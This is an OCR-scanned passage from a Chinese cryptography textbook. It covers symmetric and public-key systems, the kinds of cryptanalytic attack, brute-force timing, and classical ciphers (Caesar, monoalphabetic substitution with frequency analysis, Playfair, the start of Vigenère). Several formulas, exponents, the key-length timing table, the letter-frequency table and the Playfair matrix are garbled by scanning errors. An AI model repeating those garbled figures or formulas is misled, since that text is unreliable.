设计 原则 下 是 安全 的 密码 ,在 实际 使 用 时 对 算法 保密 ,将 会 更 安全 。 这 是 核心 密码 的 设计 和 
使 用 的 正确 路 线 。 对 于 商业 密码 应 当 坚持 在 专业 部 门 指导 下 的 公开 征集 .公开 评价 的 原则 。 

著名 密码 学 家 Bruce Schneier 在 他 的 《应 用 密码 学 ) 一 书 中 指出 “那些 因为 自己 不 能 破 
译 某 个 算法 就 草率 地 声称 有 一 个 不 可 破译 的 密码 的 人 要 么 是 天 才 , 要 么 是 笨蛋 ,不 幸 的 是 后 
者 居多 。 千 万 要 提防 那些 一 味 吹 嗪 算法 的 优点 ,但 拒绝 公开 的 人 ,相信 他 们 的 算法 就 像 相信 
骗 人 的 包 治 百 病 的 灵丹妙药 一 样 ”。 

另外 ,算法 公开 能 够 使 各 种 加 密 部 件 标准 化 ,使 通信 过 程 便 利 。 例 如 DES 在 20 世纪 作 
为 联邦 加 密 标准 ,很 多 软件 甚至 硬件 采用 其 算法 ,使 之 标准 化 ,大 大 简化 了 通信 过 程 ,降低 了 
成 本 。 


23 密码 系统 的 分 类 


1. 根据 密 钥 的 使 用 方式 分 类 


密码 体制 根据 密 钥 的 使 用 方式 不 同 , 可 分 为 对 称 密码 体制 (也 称 为 传统 密码 体制 ) 和 非 
对 称 密码 体制 (也 称 为 公 钥 密码 体制 ) 。 

1) 对 称 密码 体制 

所 谓 对 称 密码 体制 就 是 用 于 加 密 数 据 的 密 钥 和 用 于 解密 数据 的 密 钥 相同 ,或 者 二 者 之 
间 存 在 着 某 种 明确 的 数学 关系 。 绝 大 多 数 的 对 称 加 密 算法 加 密 密 钥 和 解密 密 钥 都 是 相同 
的 。 对 称 加 密 算法 要 求 通 信 双 方 在 建立 安全 信道 之 前 ,约定 好 所 使 用 的 密 钥 。 对 于 好 的 对 
称 加 密 算法 ,其 安全 性 完全 决定 于 密 钥 的 安全 ,算法 本 身 是 可 以 公开 的 ,因此 一 旦 密 钥 泄露 
就 等 于 泄露 了 被 加 密 的 信息 。 对 称 算法 是 传统 常用 的 算法 ,最 广泛 使 用 的 是 DES 算法 。 

对 称 密 码 体制 的 加 密 和 解密 表示 为 

加 密 : Ex (M) 一 C。 

解密 : Dx (CO) 一 M, 其 中 是 密 钥 。 

对 称 密码 体制 分 为 两 类 。 一 次 只 对 明文 中 的 单个 位 或 字 节 加 密 称 为 序列 密码 或 流 密 
码 。 另 一 类 对 称 密码 是 对 明文 的 一 组 位 进行 加 密 , 这 些 位 组 称 为 分 组 (block) ,这 种 方式 叫 
做 分 组 密码 。 

2) 非 对 称 加 密 体制 

非 对 称 加 密 算 法 是 指 用 于 加 密 的 密 钥 与 用 于 解密 的 密 钥 是 不 同 的 ,而 且 从 加 密 的 密 钥 
无 法 推导 出 解密 的 密 钥 。 这 类 算法 之 所 以 被 称 为 公 钥 算法 是 因为 用 于 加 密 的 密 钥 是 可 以 广 
泛 公开 的 ,任何 人 都 可 以 得 到 加 密 密 钥 并 用 来 加 密 信 息 ,但 是 只 有 拥有 对 应 解密 密 钥 的 人 才 
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能 将 信息 解密 。 

在 公 钥 体制 中 ,加 密 密 钥 不 同 于 解密 密 钥 ,将 加 密 密 钥 公之于众 , 谁 都 可 以 使 用 ; 而 解 
密 密 钥 只 有 解密 人 自己 知道 。 这 里 ,加 密 密 钥 称 为 公开 密 钥 (public key, 简称 公 钥 ) ,解密 密 
钥 称 为 私人 密 钥 (private key, 简 称 私 钥 )。 

用 公 钥 KP 对 明文 加 密 可 表示 为 : EkpCM) 一 C 

用 相应 的 私 钥 PK 对 密 文 解密 可 表示 为 : De (C) 一 M 

有 时 消息 不 用 私 钥 加 密 而 用 公 钥 解密 ,这 用 于 数字 签名 。 

迄今 为 止 的 所 有 公 钥 密码 体系 中 ,RSA 系统 是 最 著名 、 使 用 最 广泛 的 一 种 。 


2. 根据 明文 和 密 文 的 处 理 方式 分 类 


根据 对 明文 和 密 文 的 处 理 方式 和 密 钥 的 使 用 不 同 ,可 将 密码 体制 分 成 分 组 密码 和 序列 
密码 体制 。 

1) 分 组 密码 (block cipher) 

设 M 为 明文 ,分 组 密码 将 M 划分 为 一 系列 明文 块 Mi ,通常 每 块 包含 若 干 字符 ,并 且 对 
每 一 块 M; 都 用 同一 个 密 钥 K。 进行 加 密 。 即 

M= (Mi,M;,*…,M,),C=(Ci ,Cs ,C,), 其 中 C=E(M;,K.),i=1,2,°,n。 

现代 计算 机 密码 算法 的 典型 分 组 长 度 为 64 位 ,这 个 长 度 大 到 足以 防止 分 析 破 译 ,但 又 
小 到 足以 方便 使 用 。 

2) 序列 密码 (stream cipher) 

将 明文 和 密 钥 都 划分 为 位 (bit) 或 字符 的 序列 ,并 且 对 明文 序列 中 的 每 一 位 或 字符 都 用 
密 钥 序列 中 对 应 的 分 量 来 加 密 , 即 

M= (mi ,zzz mn) Ke= (ka sk ko) C=(C ,Ce ,C,) ,其 中 C;=E(m, ,ki), 
i=],2,°" ne 

分 组 密码 每 次 加 密 一 个 明文 块 .序列 密码 每 次 加 密 一 个 比特 位 或 一 个 字符 。 在 计算 机 
出 现 之 前 ,算法 普遍 每 次 只 对 明文 的 一 个 字符 运算 ,可 以 认为 是 序列 密码 对 字符 序列 的 
运算 。 


3. 根据 加 密 算法 是 否 变 化 分 类 


根据 加 密 算法 在 使 用 过 程 中 是 否 变化 ,可 将 密码 体制 分 成 固定 算法 密码 体制 和 变化 算 
法 密码 体制 。 

1) 固定 算法 密码 体制 

设 巨 为 加 密 算法 ,Ko ,Ki ,…, 开 ,为 密 钥 ,Mo ,Mi,…,M, 为 明文 ,C 为 密 文 ,如 果 把 明 
文 加 密 成 密 文 的 过 程 中 加 密 算法 固定 不 变 , 则 称 其 为 固定 算法 密码 体制 。 

Co = ECMo ,Ko) ,Ci = ECOM ,Ki) ,°C, = E(M,,K,) 

2) 变化 算法 密码 体制 

设 忆 为 加 密 算 法 ,Ku ,Ki,…,K, 为 密 钥 ,Mo ,Mi,…,M, 为 明文 ,C 为 密 文 ,如 果 把 明 
文 加 密 成 密 文 的 过 程 中 加 密 算法 不 断 变 化 , 则 称 其 为 变化 算法 密码 体制 。 

Cu = ECM Ku ,GC = Ei (Mi ,Ki) ,GC, = E,(M,,K,) 
由 于 加 密 算 法 在 加 密 过 程 中 可 受 密 钥 控 制 不 断 变化 , 则 可 以 极 大 提高 密码 的 强度 , 若 能 
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使 加 密 算 法 朝 着 越 来 越 好 的 方向 演化 , 那 密码 就 成 为 一 种 自发 展 的 、 渐 强 的 密码 , 称 为 演化 


24 密码 分 析 


如 果 能 够 根据 对 密 文 的 分 析 来 确定 明文 或 密 钥 ,或 者 能 够 根据 明文 - 密 文 对 来 确定 出 密 
钥 , 则 我 们 说 这 个 密码 是 可 破译 的 。 破 译 过 程 称 为 密码 分 析 。 
攻击 密码 体制 一 般 有 两 种 方法 , 即 密码 分 析 和 穷 举 攻击 。 


1. 密码 分 析 


这 种 攻击 依赖 于 算法 的 性 质 和 明文 的 一 般 特 征 或 某 些 明文 - 密 文 对 。 企 图 利用 算法 的 
特征 来 推导 出 明文 或 使 用 的 密 钥 。 如 果 这 种 攻击 能 成 功 地 推导 出 密 钥 ,那么 影响 则 是 灾难 
性 的 ,将 会 危及 所 有 使 用 该 密 钥 加 密 消息 的 安全 。 对 称 密码 体制 的 所 有 分 析 方 法 都 利用 了 
这 样 一 种 情况 : 明文 的 结构 和 模式 在 加 密 之 后 仍然 保存 ,并 能 在 密 文中 找到 线索 。 

对 公开 密 钥 加 密 体 制 的 分 析 则 是 一 个 完全 不 同 的 体系 ,通常 称 之 为 数学 分 析 攻 击 。 密 
码 分 析 者 针对 加 解密 算法 的 数学 基础 和 某 些 密码 学 特性 ,通过 数学 求解 的 方法 来 破译 密码 。 
数学 分 析 攻 击 是 对 基于 数学 难题 的 各 种 公开 密 钥 加 密 体制 的 主要 威胁 。 为 了 对 抗 这 种 数学 
分 析 攻 击 ,应 当选 用 具有 坚实 数学 基础 和 足够 复杂 的 加 解密 算法 。 


2. 穷 举 攻击 

穷 举 攻击 是 指 攻击 者 对 一 条 密 文 尝试 所 有 可 能 的 密 钥 , 直 到 把 它 转化 成 为 可 读 的 有 意 
义 的 明文 。 平 均 而 言 ,获得 成 功 至 少 要 尝试 所 有 可 能 密 钥 的 一 半 。 
24.1 密码 分 析 学 


密码 分 析 学 是 在 不 知道 密 钥 的 情况 下 ,恢复 出 明文 的 一 门 科学 。 成 功 的 密码 分 析 能 恢 
复出 消息 的 明文 或 密 钥 。 密 码 分 析 也 可 以 发 现 密码 体制 的 弱点 ,最 终 得 到 明文 或 密 钥 。 对 
密码 进行 分 析 的 尝试 称 为 攻击 (attack)。 

假设 攻击 者 是 在 已 知 密码 体制 (已 知 加密 算 法 ) 的 前 提 下 来 破译 使 用 的 密 钥 ,根据 攻击 
者 掌握 的 资源 不 同 , 最 常见 的 攻击 形式 如 下 。 


1. 唯 密 文 攻击 (ciphertext only) 


密码 分 析 者 仅 根据 截获 的 密 文 来 破译 密码 。 由 于 密码 分 析 者 所 能 利用 的 数据 资源 仅 为 
密 文 , 这 是 对 分 析 者 最 不 利 的 情况 。 


2. 已 知 明 文 攻击 (known plaintext) 


分 析 者 根据 已 经 知道 的 某 些 明 文 - 密 文 对 来 破译 密码 。 例 如 ,密码 分 析 者 可 能 知道 从 用 
户 终端 送 到 计算 机 的 密 文 数据 从 一 个 LOGIN 开头 。 又 例如 ,诸如 END、IF、THEN 等 词 的 
密 文 有 规律 地 在 密 文中 出 现 ,密码 分 析 者 可 以 合理 地 猜测 它们 。 近 代 密 码 学 认为 ,一 个 密码 
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仅 当 它 能 经 得 起 已 知 明 文 攻 击 才 是 可 取 的 。 
3. 选择 明文 攻击 (chosen plaintext) 


选择 明文 攻击 的 破译 者 除了 知道 加 密 算法 外 ,还 可 以 选 定 明文 消息 ,并 可 以 知道 对 应 的 
通过 加 密 得 到 的 密 文 , 即 知 道 选择 的 明文 和 对 应 的 密 文 。 例 如 , 公 钥 密码 体制 中 ,攻击 者 可 
以 利用 公 钥 加 密 他 任意 选 定 的 明文 ,这 种 攻击 就 是 选择 明文 攻击 。 这 是 对 分 析 者 十 分 有 利 
的 情况 。 计 算 机 文件 系统 和 数据 库 系 统 特别 容易 受到 这 种 攻击 ,因为 用 户 可 以 随意 选择 明 
文 ,并 获得 相应 的 密 文 文件 和 密 文 数据 库 。 


4. 选择 密 文 攻击 (chosen ciphertext) 


与 选择 明文 攻击 相对 应 ,破译 者 除了 知道 加 密 算 法 外 ,还 知道 他 自己 选 定 的 密 文 和 对 应 
的 .已 解密 的 明文 , 即 知道 选择 的 密 文 和 对 应 的 明文 。 

在 这 些 攻 击 方法 中 , 唯 密 文 攻击 难度 最 大 ,因为 攻击 者 拥有 的 信息 量 最少 。 不 过 在 很 多 
情况 下 ,攻击 者 可 以 得 到 更 多 的 信息 ,例如 电子 金融 消息 往往 有 标准 化 的 文件 头 或 者 标志 ， 
这 样 就 使 其 转化 成 了 已 知 明文 攻击 。 

如 果 分 析 者 能 够 通过 某 种 方式 ,让 发 送 方 在 发 送 的 信息 中 插入 一 段 由 他 选择 的 信息 , 那 
么 就 成 了 选择 明文 攻击 ,他 一 般 会 故意 选取 那些 最 有 可 能 恢复 出 密 钥 的 数据 。 

只 有 相对 较 弱 的 算法 才 抵挡 不 住 唯 密 文 攻击 。 一 般 来 说 ,加 密 算法 起 码 要 能 经 受 得 住 
已 知 明文 攻击 。 

另外 还 有 一 个 概念 值得 注意 。 如 果 无 论 有 多 少 可 以 使 用 的 密 文 ,都 不 足以 唯一 地 确定 
在 该 体制 下 的 密 文 所 对 应 的 明文 , 则 此 加 密 体制 是 无 条 件 安 全 的 。 一 次 一 密 (one-time pad) 
可 以 满足 无 条 件 安全 。 一 次 一 密 用 一 组 完全 无 序 的 数字 对 消息 进行 编码 ,而 且 只 使 用 一 次 。 
例如 明文 为 HELP, 每 个 字母 对 应 一 个 随机 的 数字 , 且 相 同 字母 对 应 的 数字 不 重复 , 密 文 假 
设 为 25 9 20, 这 种 算法 的 密 钥 为 字母 序列 对 应 随机 数字 序列 ,这 种 序列 至 少 和 密 文 一 样 
长 ,在 不 知道 序列 的 情况 下 ,无 论 取得 多 少 密 文 ,都 无 法 破解 出 相应 的 明文 ,属于 无 条 件 安 
全 。 但 由 于 这 种 加 密 方式 的 密 钥 序列 至 少 和 密 文 一 样 长 ,安全 传递 密 钥 本 身 的 复杂 性 就 相 
当 于 甚至 高 于 传递 消息 本 身 , 所 以 一 次 一 密 并 没有 多 少 实用 价值 。 

除了 一 次 一 密 之 外 ,所 有 的 算法 都 不 是 无 条 件 安全 的 ,也 就 是 说 ,在 理论 上 是 可 能 被 攻 
破 的 。 因 此 ,加 密 算法 应 该 至 少 满足 下 面 的 两 个 条 件 之 一 : 

(1) 破译 密码 的 代价 超出 密 文 信息 的 价值 。 那 么 对 于 破解 密码 的 人 来 说 ,这 么 做 是 没 
有 意义 的 。 

(2) 破译 密码 的 时 间 超 出 密 文 信息 的 有 效 期 。 当 密码 被 破解 时 ,明文 实际 上 已 经 丧失 
了 使 用 价值 。 

满足 上 述 两 个 条 件 之 一 的 密码 体制 被 称 为 在 计算 上 是 安全 的 。 


242 穷 举 攻击 


试 遍 所 有 密 钥 直到 有 一 个 正确 的 密 钥 能 够 把 密 文 还 原 成 明文 ,这 就 是 穷 举 攻击 。 一 般 
来 说 ,要 获取 成 功 必须 尝试 所 有 可 能 密 钥 的 一 半 。 
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无 论 对 于 多 么 优秀 的 密码 算法 ,都 必须 要 考虑 到 穷 举 攻击 的 威胁 。 假 设 , 密 钥 只 有 1 个 
bit, 那 么 密 钥 只 能 是 0 或 者 1, 攻 击 者 只 需要 尝试 2 次 就 可 以 找到 正确 的 密 钥 ( 甚 至 只 需 
一 次 ) 。 当 密 钥 为 2 位 的 时 候 ,攻击 者 需要 尝试 4 次 , 当 密 钥 增加 到 64 位 时 ,攻击 者 需要 尝 
试 2# 次 才能 把 所 有 的 密 钥 都 尝试 一 遍 。 以 DES 加 密 算法 为 例 , 它 的 密 钥 为 56 位 , 则 其 密 
钥 个 数 为 2* 个 ,假设 执行 一 次 加 解密 需要 1ps 的 话 ( 这 是 普通 计算 机 的 速度 ) , 则 穷 举 密 钥 
空间 的 一 半 需 要 2”js 一 1142 年 。 不 过 用 大 型 机 器 来 穷 举 的 话 ,例如 使 用 每 微 秒 执行 100 万 
次 加 密 的 计算 机 ,那么 只 需要 10 小 时 。 对 于 今天 的 对 称 密 钥 加 密 算 法 来 说 ,为 了 抵御 穷 举 
攻击 , 密 钥 的 位 数 至 少 为 128 位 , 表 2-1 罗列 了 穷 举 一 半 密 钥 空 间 所 需 的 时 间 。 

表 2-1 穷 举 一 半 密 钥 空间 所 需 的 时 间 


每 微 秒 执行 一 次 加 密 每 微 秒 执行 100 万 
和 和 人 让 人 所 需 时 间 次 加 密 所 需 时 间 
32 二 约 36min 2.147ms 
56 25 1142y 10h 
128 pa 5.4X10"*y 5.4X10y 
168 2 5.9X10%y 5.9X10ay 
26 个 字符 的 排列 组 合 26! 6.4X1012y 6.4X105y 


另外 值得 注意 的 是 ,计算 机 网 络 的 广泛 应 用 ,特别 是 Internet 的 广泛 应 用 ,可 以 把 全 世 
界 的 计算 机 资源 连 成 一 体 ,形成 巨大 的 计算 能 力 ,从 而 拥有 巨大 的 密码 破译 能 力 , 使 原来 认 
为 安全 的 密码 被 破译 。1994 年 ,40 多 个 国家 的 600 多 位 科学 家 通过 Internet, 历 时 9 个 月 
破译 了 RSA-129 密码 ,1999 年 又 破译 了 RSA-140 密码 ,2005 年 ,RSA-200 也 被 成 功 破译 。 

1997 年 6 月 18 日 美国 科罗拉多 州 以 Rocke Verser 为 首 的 工作 小 组 宣布 ,通过 利用 
Internet 上 的 数 万 台 微 机 ,历时 4 个 多 月 ,通过 穷 举 破译 了 DES。 因 此 ,在 21 世纪 ,只 有 经 
得 起 通过 Internet 进行 全 球 攻 击 的 密码 , 才 是 安全 的 密码 。 


25 经 典 密码 学 


经 典 密码 体制 (或 称 古典 密码 体制 ) 采 用 手工 或 者 机 械 操作 实现 加 解密 ,相对 简单 。 回 
顾 和 研究 这 些 密码 体制 的 原理 和 技术 ,对 于 理解 .设计 和 分 析 现 代 密 码 仍 然 有 借鉴 意义 。 

在 计算 机 出 现 前 ,密码 学 由 基于 字符 的 密码 算法 构成 。 不 同 的 密码 算法 是 字符 之 间 互 
相 代 换 或 者 互相 之 间 换 位 ,好 的 密码 算法 是 结合 这 两 种 方法 ,每 次 进行 多 次 运算 。 

大 多 数 经 典 加 密 早 在 计算 机 普及 之 前 就 已 经 被 开发 出 来 了 ,一 些 加 密 方 法 现在 还 被 密 
码 爱 好 者 所 使 用 。 广 义 地 说 ,经 典 密码 学 可 定义 为 不 要 求 用 计算 机 实现 的 所 有 加 密 算法 。 
这 并 不 是 说 它 不 能 在 计算 机 上 实现 ,而 是 因为 人 们 可 以 手工 加 密 和 解密 文字 ,在 计算 机 出 现 
后 ,由 于 计算 机 运算 的 速度 远 远 高 于 手工 计算 速度 ,所 有 经 典 密码 算法 能 够 被 计算 机 很 容易 
地 破解 。 

目前 任何 重要 的 应 用 程序 ,都 不 推荐 使 用 这 些 经 典 加 密 算 法 。 不 过 ,通过 对 这 些 算 法 的 
本 质 及 其 特点 进行 研究 ,可 以 更 好 地 理解 现代 加 密 算法 ,因为 这 些 经 典 加 密 以 一 种 很 简单 的 
方式 阐述 了 那些 促进 当前 密码 学 发 展 的 概念 。 
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经 典 密码 采用 的 两 种 基本 的 技术 ,分 别 为 代 换 技术 和 置换 技术 。 事 实 上 现代 加 密 算法 
大 多 是 综合 应 用 这 两 种 技术 来 实现 的 ,但 基于 的 数学 基础 更 加 复杂 。 

代 换 是 将 明文 字母 蔡 换 成 其 他 字母 ,数字 或 符号 的 方法 。 在 经 典 密码 学 中 ,有 四 种 类 型 
的 代 换 密码 : 

(1) 简单 代 换 密码 (或 称 单字 母 密码 ): 就 是 将 明文 的 一 个 字符 用 相应 的 一 个 密 文字 符 
代替 。 

(2) 多 名 码 代 换 密码 : 它 与 简单 代 换 密码 系统 相似 ,唯一 的 不 同 是 单个 字符 明文 可 以 
映射 成 密 文 的 几 个 字符 之 一 ,例如 A 可 能 对 应 于 5、13、25 或 56,B 可 能 对 应 于 7、19、31 或 
42, 等 等 。 

(3) 字母 代 换 密码 : 字符 块 被 成 组 加 密 ,例如 ABA 可 能 对 应 于 RTQ,ABB 可 能 对 应 于 
SLL; 等 等 。 

(4) 多 表 代 换 密码 : 由 多 个 简单 的 代 换 密码 构成 ,例如 ,可 能 有 5 个 被 使 用 的 不 同 的 简 
单 代 蔡 密 码 ,单独 的 一 个 字符 用 来 改变 明文 的 每 个 字符 的 位 置 。 

置换 技术 中 ,明文 的 字母 保持 相同 ,但 顺序 被 打 乱 了 。 在 简单 的 纵 行 换 位 密码 中 ,明文 
以 固定 的 宽度 水 平地 写 在 一 张 图 表 纸 上 , 密 文 按 垂直 方向 读 出 ,解密 就 是 将 密 文 按 相 同 的 宽 
度 垂 直 地 写 在 图 表 纸 上 ,然后 水 平地 读 出 明文 。 


25.1 代 换 密码 


代 换 密码 是 将 明文 字母 蔡 换 成 其 他 字母 ,数字 或 符号 。 如 果 把 明文 看 做 是 二 进 制 序列 ， 
那么 代 换 就 是 用 密 文 位 串 来 代 换 明文 位 串 。 


1. 恺 撒 密 码 


已 知 的 最 早 的 代 换 密码 是 由 Julius Caesar 发 明 的 Caesar 密码 。 他 对 字母 表 中 的 每 个 
字母 ,用 它 之 后 的 第 三 个 字母 来 代 换 , 例 如 对 “ 明 晨 五 点 发 动 反攻 ”进行 加 密 : 
明文 : MING CHEN WU DIAN FA DONG FAN GONG 
密 文 PLQJ FKHQ ZX GLDQ ID GRQJ IDQ JRQJ 
字母 表 循环 表示 : 
明文 :abcdefghijklmnopqrstuvwxyz 
密 文 .DEFGHIJKLMNOPQRSTUVWXYZABC 
如 果 让 每 个 字母 等 价 于 一 个 数值 
a=0,6=1,.…,z= 25 
则 加 密 公式 为 
C= E(p) = (p+3) mod (26) 
如 果 移 位 可 以 是 任意 整数 k, 则 更 加 通用 的 算法 如 下 : 
加 密 : C=E(p) 二 (p+k) mod (26) 
解密 : p= 二 D(C)==(C—k) mod (26) 
用 穷 举 分 析 可 轻松 破解 Caesar 密码 ,原因 有 三 : 一 是 加 密 和 解密 算法 已 知 ; 二 是 密 钥 
k 只 有 25 种 可 能 的 取 值 ; 三 是 明文 所 用 的 语言 是 已 知 的 ,意义 容易 识别 。 
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在 大 多 数 网 络 情况 下 ,我 们 假设 密码 算法 是 已 知 的 。 一 般 说 来 , 密 钥 空间 很 大 的 算法 使 
得 穷 举 攻击 分 析 方 法 不 太 可 行 。 因 此 ,为 了 提高 穷 举 分 析 的 难度 , 密 钥 空间 必须 很 大 。 例 如 
目前 认为 安全 的 对 称 加 密 算法 的 密 钥 空间 至 少 有 2”。 第 三 个 原因 也 是 需要 注意 的 ,如 果 
明文 所 用 的 语言 不 为 破解 者 所 知 ,那么 明文 输出 就 不 可 识别 。 


2. 单 表 代 换 密码 


恺 撤 密码 仅 有 25 种 可 能 的 密 钥 , 是 很 不 安全 的 ,如 果 允 许 任意 代 换 , 密 钥 空间 将 会 急剧 
增 大 。 

如 果 密 文 行 是 26 个 字母 的 任意 置换 ,例如 ,明文 a 用 c 来 代 换 ,b 用 剩 下 的 25 个 字母 中 
随机 的 一 个 来 代 换 ,c 用 剩 下 的 24 个 字母 中 随机 的 一 个 来 代 换 …… 依 此 类 推 。 这 样 , 密 钥 
空间 为 261, 约 4X10” 种 可 能 的 密 钥 。 这 么 大 的 密 钥 空间 应 该 可 以 抵挡 穷 举 攻击 。 这 种 方 
法 称 为 单 表 代 换 密码 ,这 是 因为 每 条 消息 用 一 个 字母 表 ( 给 出 从 明文 字母 到 密 文字 母 的 映 
射 ) 加 密 。 

不 过 ,攻击 办 法 仍然 存在 。 如 果 密 码 分 析 者 知道 明文 (例如 未 经 压缩 的 英文 文本 ) 的 属 
性 ,他 就 可 以 利用 语言 的 一 些 规律 进行 攻击 。 

例如 这 里 有 段 密 文 

UZQSOVUOHXMOPVGPOZPEVSGZWSZOPFPESXUDBMETSXAIZ 
VUEPHZHMDZSHZQWSFPAPPDTSVPQUZWYMXUZUHSX 
EPYEPOPPZSZUFPOMBZWPFUPZHMDJUDTMOHMQ 
把 密 文中 字母 使 用 的 相对 频率 统计 出 来 ,与 英文 字母 的 使 用 频率 分 布 (如 表 2-2 所 示 ) 进 行 
比较 。 


表 2-2 英文 字母 的 使 用 频率 分 布 


a 0.0856 g 0.0199 m 0.0249 S 0.0607 y 0.0199 
b 0.0139 h 0.0528 n 0.0707 , 0.1045 2 0. 0008 
€ 0.0279 i 0.0627 o 0.0797 u 0.0249 
d 0.0378 j 0.0013 p 0.0199 v 0.0092 
e 0.1304 k 0.0042 q 0.0012 w 0.0149 
0.0289 1 0.0339 r 0.0677 3 0.0017 


如 果 消 息 足够 长 ,只 用 这 种 方法 就 足够 了 ,如 果 消 息 相 对 较 短 ,还 可 以 用 到 一 些 统计 
规律 : 

(1) 英文 单词 以 ES、.D.,T 为 结尾 的 超过 一 半 。 

(2) 英文 单词 以 T.A、S、W 为 起 始 字 母 的 约 为 一 半 。 

(3) 一 般 来 说 3 个 字母 出 现 的 可 能 是 THE 或 AND。 

(4) 单个 字母 出 现 的 可 能 是 A 或 I 

(5) 最 常见 的 两 字母 组 合 .依照 出 现 次 数 递减 的 顺序 排列 : TH HE、IN、ER、AN RE、 
DE.ON.\ES.ST.EN.AT.TO.NT.HA. ND.OU.EA.NG.AS.OR.,TI.IS.ET.IT.AR、 
TE、SE、HI.OF。 

(6) 最 常见 的 三 字母 组 合 ,依照 出 现 次 数 递减 的 顺序 排列 : THE ING、AND、HER、 
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ERE.ENT.THA.NTH.WAS.ETH.\FOR.DTH., 

应 用 这 些 统计 规律 经 过 分 析 ,得 到 的 明文 是 

It was disclosed yesterday that several informal but direct contacts have been made 
with political representatives of the viet cong in moscow 

单 表 代 换 技术 之 所 以 容易 采用 统计 学 的 方法 攻破 ,关键 就 在 于 在 单 表 代 换 中 ,明文 中 的 
任何 一 个 字母 都 只 有 一 个 密 文字 母 来 代 换 。 如 果 要 实现 抗 统计 分 析 , 可 以 对 每 个 字母 提供 
多 种 代 换 ,就 像 一 个 读音 可 以 代表 多 个 同音 字 一 样 ,一 个 明文 单元 也 可 以 变换 成 不 同 的 密 文 
单元 。 比 如 字母 e, 时 而 用 字母 A 来 代 换 ,时 而 用 字母 X 来 代 换 , 等 等 。 循 环 或 随机 地 选取 
密 文 字母 来 代 换 明文 字母 。 如 果 对 每 个 明文 元 素 分 配 的 密 文 元 素 的 个 数 与 此 明文 元 素 的 使 
用 频率 成 一 定 比例 关系 ,那么 使 用 的 频率 信息 就 完全 被 隐藏 了 。 但 这 种 方法 只 能 隐藏 明文 
中 一 个 元 素 的 频率 ,多 字母 语法 模式 仍然 残留 在 密 文中 ,这 样 就 降低 了 密码 分 析 者 破译 的 
难度 。 

代 换 密码 必须 考虑 的 一 个 问题 是 ,明文 的 语法 模式 和 结构 有 多 少 仍然 保存 在 密 文中 。 
有 两 种 基本 方法 可 以 减少 残留 : 一 种 是 对 明文 中 的 多 个 字母 一 起 加 密 , 另 一 种 是 采用 多 表 
代 换 密码 。 


3. 多 表 代 换 密码 


改进 简单 的 单 表 代 换 的 方法 是 在 明文 消息 中 采用 不 同 的 单 表 代 换 。 这 样 , 密 文中 的 每 
个 字母 都 有 多 个 可 能 的 密 文字 母 来 代 换 它 ,这 种 方法 一 般 称 为 多 表 代 换 密码 , 它 通常 采用 相 
关 的 单 表 代 换 规则 集 , 并 由 密 钥 决定 给 定 变换 的 具体 规则 。 著 名 的 多 表 代 换 密 码 有 
Playfair 密码 .Hill 密码 、Vigenére 密码 等 。 

1) Playfair 密码 

Playfair 密码 由 英国 科学 家 Charles Wheatstone 于 1854 年 发 明 , 以 其 好 友 Baron 
Playfair 的 名 字 命名 。 在 第 一 次 世界 大 战 中 , 英 军 曾 使 用 Playfair 密码 作为 陆军 的 标准 加 密 
体制 。 在 第 二 次 世界 大 战 中 , 盟 军 使 用 它 作 为 通信 加 密 工具 。 

Playfair 把 明文 中 的 双 字 母音 节 作 为 一 个 单元 并 将 其 转换 成 为 密 文 的 “ 双 字 母音 节 ”。 
它 基于 一 个 由 密 钥 词 构 成 的 5X5 字母 矩阵 。 

例如 使 用 密 钥 词 是 monarchy。 填 充 和 矩阵 的 方法 是 : 首先 将 密 钥 词 从 左 至 右 、 从 上 至 下 
填 在 矩形 格子 里 。 字 母 1 和 J 和 暂时 当做 一 个 字母 ,如 表 2-3 所 示 。 


表 2-3 基于 密 钥 monarchy 的 5X5 字母 矩阵 


M O N a R 
C H oe B D 
E FP G VJ K 
Eb 下 Q S 于 
U V Ww X Z 


对 明文 按 如 下 规则 一 次 加 密 两 个 字母 : 
(1) 如 果 该 字母 对 的 两 个 字母 是 相同 的 ,那么 在 它们 之 间 加 一 个 填充 字母 ,比如 x。 例 
如 balloon, 先 把 它 变 成 ba lx lo on 这 样 四 个 字母 对 。 
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(2) 落 在 矩阵 同一 行 的 明文 字母 对 中 的 字母 由 其 右边 的 字母 来 代 换 , 每 行 中 最 右边 的 
一 个 字母 用 该 行 中 最 左边 的 第 一 个 字母 来 代 换 ,比如 ar 变 成 RM。 

(3) 落 在 矩阵 同一 列 的 明文 字母 对 中 的 字母 由 其 下 面 的 字母 来 代 换 , 每 列 中 最 下 面 的 
一 个 字母 用 该 列 中 最 上 面 的 一 个 字母 来 代 换 ,比如 mu 变 成 CM。 

(4) 其 他 的 每 组 明文 字母 对 中 的 字母 按 如 下 方式 代 换 : 它 所 在 的 行 是 该 字母 所 在 行 ， 
列 则 为 另 一 字母 所 在 列 。 比 如 hs 变 成 BP ,ea 变 成 IM( 或 JM)。 

Playfair 密码 相对 于 简单 的 单 表 密码 是 一 个 巨大 的 进步 。 首 先 ,因为 有 26 个 字母 , 故 
有 26X26 一 676 个 字母 对 ,因此 对 单个 的 字母 对 进行 判断 要 困难 得 多 。 

此 外 ,单个 字母 在 使 用 频率 的 统计 规律 上 比 字母 对 要 强 得 多 。 这 样 利用 使 用 频率 分 析 
字母 对 就 困难 些 。 一 个 明文 字母 有 多 种 可 能 的 代 换 密 文字 母 ,使 得 频率 分 析 困 难得 多 (例如 
hs 被 代 换 为 BP,hq 被 代 换 为 YP, 字 母 h 被 不 同 的 字母 代替 ) 。 

因为 这 些 原因 ,Playfair 密码 在 很 长 一 段 时间 内 被 认为 是 牢 不 可 破 的 。 

尽管 Playfair 密码 被 认为 比较 安全 ,但 其 实 它 仍然 是 相对 容易 攻破 的 ,因为 它 的 密 文 仍 
然 完 整地 保留 了 明文 语言 的 结构 。 几 百 个 字母 的 密 文 就 足够 我 们 分 析 规 律 了 。 

2) Vigenere 密码 

最 简单 的 多 表 代 换 密码 是 Vigenere 密码 。 

它 的 代 换 规则 集 由 26 个 类 似 Caesar 密码 的 代 换 表 组 成 ,其 中 每 一 个 代 换 表 示 对 明文 
字母 表 移 位 0 到 25 次 后 的 代 换 单 表 。 每 个 密码 代 换 表 由 一 个 密 钥 字母 来 表示 。 

例如 密 钥 字母 为 aa 代表 0) ,明文 字母 为 c, 则 密 文 字母 为 0 十 2(mod 26) 一 2, 也 就 是 c。 

每 一 个 密 钥 字母 加 密 一 个 明文 字母 ,直到 所 有 的 密 钥 字母 用 完 , 然 后 再 从 头 开始 ,使 用 
第 一 个 密 钥 字母 加 密 。 也 就 是 说 , 密 钥 循 环 使 用 。 

